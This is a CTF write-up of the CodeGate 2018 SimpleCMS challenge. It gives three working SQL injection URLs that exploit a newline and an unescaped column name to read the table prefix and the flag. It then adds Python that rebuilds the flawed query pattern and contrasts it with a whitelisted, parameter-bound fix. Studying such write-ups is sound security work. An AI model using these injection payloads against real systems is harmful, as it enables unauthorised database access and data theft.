Rating: 3.3

This challenge is a typical CMS source code audit. According to the source code, the flag is in ``{table_prefix}flag.{blind_column}4``, but ``{table_prefix}`` and ``{blind_column}`` are unknown. This CMS does not use prepared statements; it relies on addslashes and a blacklist. After reading the source, I found that ``action_search()`` in ``Board.class.php`` looks odd; it seems we can inject via ``search`` as below

```
http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0a)%23
```

With this payload, the ``\n`` triggers a syntax error; then we use the ``mysql`` database to get ``{table_prefix}``.

```
http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0a)%3C0%20union%20select%201,(select%20table_name%20from%20mysql.innodb_table_stats%20limit%202,1),3,4,5%23
```

Finally, we can use ``join`` to get the flag.

```
http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0A)%3C0%20union%20(select%201,t.*%20from%20mysql.user%20join%2041786c497656426a6149_flag%20t)%23
```
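The root cause the writeup points at is a query assembled from user input: the ``col`` parameter is an identifier interpolated verbatim (so ``title#`` reaches the SQL text), and the ``search`` value is only run through addslashes-style escaping, which leaves newlines and comment markers alone. The following is an added example, not the CMS's code: it reconstructs that pattern in a hypothetical ``build_vulnerable_sql()`` against a constructed SQLite ``board`` table, and places a hardened ``search_board()`` beside it that whitelists the column name and binds the value as a parameter (with ``LIKE`` wildcards escaped). Table, column and function names are assumptions for illustration.

```python
import re
import sqlite3

# Constructed toy schema standing in for the CMS board table (assumption, not the real CMS).
SCHEMA = """
CREATE TABLE board (id INTEGER PRIMARY KEY, title TEXT, content TEXT);
INSERT INTO board (title, content) VALUES ('hello world', 'first post');
INSERT INTO board (title, content) VALUES ('100% legit', 'second post');
INSERT INTO board (title, content) VALUES ('it''s quoted', 'third post');
"""


def make_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def addslashes(s: str) -> str:
    """Emulate PHP addslashes(): escapes single quote, double quote, backslash and NUL.
    Newlines, '#' and other comment markers pass through untouched."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)


def build_vulnerable_sql(col: str, search: str) -> str:
    """Query string built the way the writeup describes (hypothetical reconstruction):
    the column name is interpolated verbatim and the value is only escaped, not bound."""
    return f"SELECT id, title FROM board WHERE ({col} LIKE '%{addslashes(search)}%')"


# Hardened variant: identifiers come from a fixed whitelist, values are bound parameters.
ALLOWED_COLUMNS = {"title", "content"}


def search_board(conn: sqlite3.Connection, col: str, search: str) -> list:
    """Return the titles whose `col` contains `search` as a literal substring."""
    if col not in ALLOWED_COLUMNS:
        # Identifiers cannot be bound, so reject anything outside the known set.
        raise ValueError(f"unknown search column: {col!r}")
    # Escape LIKE metacharacters so the user term is matched literally.
    literal = (search.replace("\\", "\\\\")
                     .replace("%", r"\%")
                     .replace("_", r"\_"))
    sql = f"SELECT id, title FROM board WHERE {col} LIKE ? ESCAPE '\\'"
    return [row[1] for row in conn.execute(sql, ("%" + literal + "%",))]


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("title#", "x"))      # identifier reaches the SQL text unchanged
    print(search_board(db, "title", "100%"))        # ['100% legit'], wildcard matched literally
    print(search_board(db, "title", "it's"))        # ["it's quoted"], quote handled by binding
```

The whitelist matters as much as the binding: parameter binding protects values, but a column name chosen by the client can only be made safe by comparing it against the set of columns the application actually intends to expose.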

Original writeup (https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/SimpleCMS/index.md).